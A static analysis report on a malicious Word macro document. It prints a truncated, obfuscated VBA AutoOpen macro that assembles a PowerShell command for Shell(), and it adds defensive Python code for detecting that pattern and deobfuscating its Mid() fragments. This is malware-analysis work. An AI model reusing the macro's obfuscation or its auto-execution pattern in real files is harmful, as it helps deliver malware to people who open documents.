Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 760f6ed412004b39…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 274.5 KB
Created: 2017-12-01 12:46:00
Authoring application: Microsoft Office Word
First seen: 2017-12-08
MD5: d0aeea69654c21bc994d53d4698502b0
SHA-1: 7ae288a8eed0da848f025891df42fa880d81af7d
SHA-256: 760f6ed412004b393a1ea73a488c8e4646563061639dba156e6213f0643ba525
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Word document carrying a VBA project with an AutoOpen entry point. The OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics show that the macro calls Shell() from an auto-execution routine, so an external command runs as soon as the document is opened with macros enabled. The ClamAV signature Doc.Macro.Obfuscation-6389653-0 matches the obfuscation pattern visible in the extracted source: a large number of decoy Array(LTrim(LTrim("a" + "b"))) assignments, with the real content hidden in Mid("...", start, length) slices whose literals contain PowerShell fragments ([cHar]71+[cHar]50+[cHar]83, which evaluates to the separator "G2S" that the script then replaces with "|"; .rEPLaCe(...); Invoke-Item; a try/catch block with write-host). This is the pattern of a macro that assembles a PowerShell command string at runtime and hands it to Shell(); the primary function of the script therefore appears to be downloading and executing a second-stage payload. Two caveats for the analyst: the second-stage URL was not recovered statically (the only extracted URL, schemas.openxmlformats.org, is a standard Office XML namespace, not an indicator), and the canned text of the OLE_LEGACY_WORDBASIC_AUTOEXEC finding ("no modern VBA project was recovered") is contradicted by the extracted macros.bas, so that finding should be read as a redundant AutoOpen marker rather than independent evidence.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6389653-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source contains a Shell() call, i.e. the macro launches an external process.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines AutoOpen, which Word runs automatically when the document is opened (subject to the user's macro security settings).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: for this sample a VBA project was in fact recovered (macros.bas, below), so this finding duplicates OLE_VBA_AUTOOPEN rather than adding evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body). This is the standard DrawingML namespace URI present in ordinary Office files and is not an indicator.
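The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above fires on token co-occurrence in raw streams rather than on decompressed source. The following is an added example, written for this page and not the analysis platform's own signature, of that idea: it scans a stream's bytes for an auto-execution identifier and an execution identifier in both 8-bit and UTF-16LE form and flags the stream only when both classes are present. The token lists, the helper names and the two sample streams are this example's assumptions.

```python
import re

# Token classes modelled on the heuristic's description: an auto-execution
# entry point plus a shell/download/object-execution token. These lists are an
# assumption of this example, not the report's actual signature.
AUTOEXEC_TOKENS = ("AutoOpen", "Document_Open", "AutoExec", "Auto_Open",
                   "Workbook_Open", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "powershell",
               "URLDownloadToFile", "ShellExecute")


def _patterns(tokens):
    """Compile each token for both 8-bit and UTF-16LE encodings, case-insensitive.

    Identifiers inside compiled VBA (p-code) and Office cache streams can appear
    in either encoding, so a source-text-only scan would miss them. Matching is
    by substring on purpose: "Shell" also fires on "WScript.Shell" and "powershell".
    """
    compiled = []
    for tok in tokens:
        ascii_form = re.escape(tok.encode("latin-1"))
        utf16_form = re.escape(tok.encode("utf-16-le"))
        compiled.append((tok, re.compile(b"(?:%s|%s)" % (ascii_form, utf16_form),
                                         re.IGNORECASE)))
    return compiled


def scan_stream(data: bytes) -> dict:
    """Report auto-exec and exec tokens found in one raw OLE stream.

    'flagged' is True only when at least one token of each class is present,
    mirroring the co-occurrence rule of the heuristic.
    """
    hits = {"autoexec": [], "exec": []}
    for tok, pat in _patterns(AUTOEXEC_TOKENS):
        if pat.search(data):
            hits["autoexec"].append(tok)
    for tok, pat in _patterns(EXEC_TOKENS):
        if pat.search(data):
            hits["exec"].append(tok)
    hits["flagged"] = bool(hits["autoexec"]) and bool(hits["exec"])
    return hits


# Constructed stand-in for a p-code/cache stream: binary filler, "AutoOpen"
# stored as UTF-16LE, and an upper-cased SHELL token in 8-bit text.
SUSPICIOUS_STREAM = (b"\x00\x01\x02" + "AutoOpen".encode("utf-16-le")
                     + b"\x00\x00\xffSHELL\x00cmd /c\x00\x10\x20")

# Constructed benign stream: an event handler that only touches a document
# property, so it has an auto-exec token but no execution token.
BENIGN_STREAM = b"\x00\x01Document_Open\x00ActiveDocument.Saved = True\x00"


if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_STREAM), ("benign", BENIGN_STREAM)):
        print(label, scan_stream(blob))
```

To apply this to a real OLE file, iterate the streams with olefile (`olefile.OleFileIO(path)`, `listdir(streams=True)`, `openstream(name).read()`) and call `scan_stream` on each; the co-occurrence rule keeps a lone `Document_Open` that only sets a property, as in the benign sample, from triggering.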

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 136863 bytes
SHA-256: b7dafe0cf3a6146921cc82e946398dd784ba799846375b559c4ebd1f4dcfdfb7

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zKETIifthc"
Function BajsCjKRDYzJH()
OrDbQpvJDf = Array(LTrim(LTrim("TAvQIrfZmZsmh" + "WrEHTUtr")), LTrim(LTrim("bajjnhwYjtV" + "JNbiNblvA")), LTrim(LTrim("WRNzdqjPf" + "cWUpbIsrnBMsMq")), LTrim(LTrim("ddZGsIwd" + "EPWpEIsR")), LTrim(LTrim("bqntlGEjt" + "zFdFWkzM")), LTrim(LTrim("JmlfsLlM" + "CniJuilAZksS")), LTrim(LTrim("JOoiDaJ" + "FEwlHcpKvizuSh")), LTrim(LTrim("dqLzUWL" + "UnIdXrNIK")))
TUFjHs = Mid("lmpWcjBlIc[5]+Ss4xSs4)').rEPLaCe(([cHar]71+[cHar]50+[cHar]83),'|').rEPLaCe(([cJuPcN78w5wZI", 7, 72)
csTwbvDz = Array(LTrim(LTrim("zculLmD" + "hzqUVodTFTA")), LTrim(LTrim("XSJGNARHj" + "PJTfNhdQp")), LTrim(LTrim("qiiuApftzK" + "QkwjhTnYKVw")), LTrim(LTrim("QjhApbwpodcWpn" + "FYVXJWkwY")), LTrim(LTrim("zfOpsfDulN" + "TopSBUrm")), LTrim(LTrim("bqtEhAoz" + "bjlIfqvhzwwZb")), LTrim(LTrim("ZDmjjFH" + "tMPtImK")), LTrim(LTrim("rqFHKhZL" + "zWUUunjz")))
wNWlPQIa = Array(LTrim(LTrim("mzihXmB" + "pdCsYibIKosbpd")), LTrim(LTrim("pczzzSSiaprfkX" + "SYzYjhNcPZBOhZ")), LTrim(LTrim("jNJDtFanC" + "WvbChCrlOVT")), LTrim(LTrim("QzMcAiazDlI" + "GiWhipsk")), LTrim(LTrim("vJmlZiWKdTDwFw" + "rQFrNEZl")), LTrim(LTrim("RwDfKHYcjiVn" + "raADnZSENA")), LTrim(LTrim("KpNkAXqVYzTc" + "rAWubNWaYRZ")), LTrim(LTrim("rKRzTiDvVUU" + "obLsAPaXwVLnDX")))
PcOzfVOBAI = Array(LTrim(LTrim("wsmmVbQFo" + "wNFjjZwsAmAU")), LTrim(LTrim("YOjAimmOudR" + "jQKNmat")), LTrim(LTrim("NdaldVuSNGnNcP" + "YlbiTBXCk")), LTrim(LTrim("jzJniNLHaOvnz" + "MrUBnqEXTC")), LTrim(LTrim("cLsasqaqwzYl" + "isbFCBSkoDV")), LTrim(LTrim("hVPuiIiGACC" + "hhYUzzanG")), LTrim(LTrim("TuOwVRjBoHWzK" + "LwPpuiifqI")), LTrim(LTrim("UdwnodiUtC" + "fkmMXzOuwh")))
WNlqAfna = Mid("348U6+[CHAR]115),[CHAR]39) G'+'2S&( zqAEnV:PUBLiC[13]+zqAEnV:PUlrBqV27Hb6Pv4ld", 5, 59)
slTkb = Array(LTrim(LTrim("AiHmYnFJNYV" + "RQjJWfc")), LTrim(LTrim("zBiaJqC" + "WwdwwECROiv")), LTrim(LTrim("iSwTfLJ" + "RMpHbRiz")), LTrim(LTrim("jchlZmPvZHMNOu" + "kWXjDKuwhuOKI")), LTrim(LTrim("UfaDShFOUJ" + "iYGDwuCRCXE")), LTrim(LTrim("zvplizrKcGZEcm" + "wNhVCNAU")), LTrim(LTrim("ovlALtGwQlcH" + "vbOczDczCaJ")), LTrim(LTrim("GEUBCjwbDziO" + "wjzaorJCTRFHZ")))
nZBqz = Array(LTrim(LTrim("DIBkktcKoD" + "aBokOzi")), LTrim(LTrim("iRSqQfCiGfQvM" + "zZqmEspsjORaJ")), LTrim(LTrim("XnlPQHDFlSkF" + "KViXHsjDPubv")), LTrim(LTrim("wmiDZqVRKTuB" + "FnsnXCzKiWE")), LTrim(LTrim("JhajIsJUfIQWh" + "tjQABkWcnwLbW")), LTrim(LTrim("waUPdNQJuk" + "bkhAwWV")), LTrim(LTrim("fIPudUU" + "jtiVhWjYEo")), LTrim(LTrim("sUckofz" + "zpcrZqVrRjj")))
CUuRjdw = Array(LTrim(LTrim("ridbajRlsfN" + "OJGoMmdjF")), LTrim(LTrim("wuWuOir" + "jNfPLNtBwthwEA")), LTrim(LTrim("qaZdTbfW" + "WmkjEfVmu")), LTrim(LTrim("zzhwwtvKnjBJzw" + "jUpAXTBrNtYd")), LTrim(LTrim("zSXuCGAN" + "cakYQrmQ")), LTrim(LTrim("nlBXLjmW" + "zHUEaPlNUMH")), LTrim(LTrim("szUYsOPz" + "KEzjksI")), LTrim(LTrim("HqIfbDFoXA" + "mDWaIGunjz")))
DRSdPuFY = Mid("5N735VzXjO6RQ8E1hbk5msYun6Sw1saVpbc.ToStriNVs+NVsng(NVs+NVs),'+' NVs+NVsRSV'+'huas);NVs+N'+'VsInvoke-Item(RNVs+NVsSVhuNVs+NVsas);break;}catSs4+Ss4ch{NVs+NVswriteNVs+NVs-host R'+'SVNVs+NVs_.Ex'+'ceptiNVs+NVson.MesNVs+NVsSs4+Ss4dHb", 34, 193)
QrGczsdQEFj = Array(LTrim(LTrim("uJtjPQPUEAJwH" + "clCXaOiuUi")), LTrim(LTrim("CFiLiSr" + "zGiatVYPiV")), LTrim(LTrim("jjjDNjouGSLApP" + "NLkIaiRYKPt")), LTrim(LTrim("JCBwAYWw" + "SBRbqYlEmF")), LTrim(LTrim("LNHNiWvQOHZoTZ" + "rETLbTQHvJT")), LTrim(LTrim("jJjTXJAwvuo" + "ddFjPsNzCK")), LTrim(LTrim("hlaiauGMDLqL" + "ioBiTak")), LTrim(LTrim("PzhwNhrCwWdZdz" + "zfZDpikInRzB")))
pCRtIbluW = Array(LTrim(LTrim("SWXcnDWXp" + "dnNVwaRuPk")), LTrim(LTrim("OuMwnioaqE" + "ZoYmIwQCRzL")), LTrim(LTrim("JPIEJfdtRPwEbK" + "zYhzwSBOZwM")), LTrim(LTrim("SiNSUCvDi" + "aiuMKJKpUKz")), LTrim(LTrim("QdjCMfIBjI" + "MLPEwiBjHvUwDC")), LTrim(LTrim("HrDkbCVzNjiS" + "PuhvShiBvFNLT")), LTrim(LTrim("pZwfjAaYQwz" + "urNCVOLLQMN")), LT
... (truncated)
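The macro above hides its payload in the Mid("...", start, length) assignments while the Array(LTrim(LTrim("a" + "b"))) lines are decoys. As an added example, written for this page and not part of the analysis platform or the sample, the script below evaluates every literal-argument Mid() call with VBA's 1-based semantics and collects the recovered fragments in source order, which is the first step of static deobfuscation before the PowerShell string is reassembled. The two Mid() lines in the sample text are copied from the preview; the decoy Array() line is a constructed, shortened version of the first one, and the regexes assume literal arguments only (a Mid() over a variable is not handled).

```python
import re


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(s, start, length): 1-based start; a start past the end yields ""."""
    if start < 1 or length < 0:
        raise ValueError("Mid: start must be >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


# Assignment of a Mid() over a string literal: var = Mid("...", start, length).
# VBA literals cannot contain a bare double quote, so [^"]* is sufficient here.
MID_CALL = re.compile(r'(\w+)\s*=\s*Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')
# Decoy pattern used throughout the sample: var = Array(LTrim(LTrim("a" + "b")), ...)
JUNK_ARRAY = re.compile(r'(\w+)\s*=\s*Array\(LTrim\(')


def recover_fragments(vba_source: str) -> list:
    """Return (variable, recovered_text) for each literal Mid() assignment, in order."""
    out = []
    for m in MID_CALL.finditer(vba_source):
        var, literal, start, length = m.group(1), m.group(2), int(m.group(3)), int(m.group(4))
        out.append((var, vba_mid(literal, start, length)))
    return out


def noise_ratio(vba_source: str) -> tuple:
    """(decoy Array(LTrim(...)) assignments, payload-carrying Mid() assignments)."""
    return len(JUNK_ARRAY.findall(vba_source)), len(MID_CALL.findall(vba_source))


# Sample input: two Mid() lines from the extracted macro plus one constructed,
# shortened decoy line in the same style, so the script runs offline.
SAMPLE_VBA = r'''
OrDbQpvJDf = Array(LTrim(LTrim("TAvQIrfZmZsmh" + "WrEHTUtr")), LTrim(LTrim("bajjnhwYjtV" + "JNbiNblvA")))
TUFjHs = Mid("lmpWcjBlIc[5]+Ss4xSs4)').rEPLaCe(([cHar]71+[cHar]50+[cHar]83),'|').rEPLaCe(([cJuPcN78w5wZI", 7, 72)
WNlqAfna = Mid("348U6+[CHAR]115),[CHAR]39) G'+'2S&( zqAEnV:PUBLiC[13]+zqAEnV:PUlrBqV27Hb6Pv4ld", 5, 59)
'''


if __name__ == "__main__":
    decoys, payload = noise_ratio(SAMPLE_VBA)
    print("decoy assignments:", decoys, "payload assignments:", payload)
    for var, text in recover_fragments(SAMPLE_VBA):
        print(var, "->", text)
```

Running it on the full macros.bas reveals the fragment order and the leading/trailing junk that each Mid() call strips; the recovered pieces still carry the inner PowerShell-level obfuscation (the [cHar] arithmetic and .rEPLaCe() calls seen in the preview), which has to be resolved as a second pass.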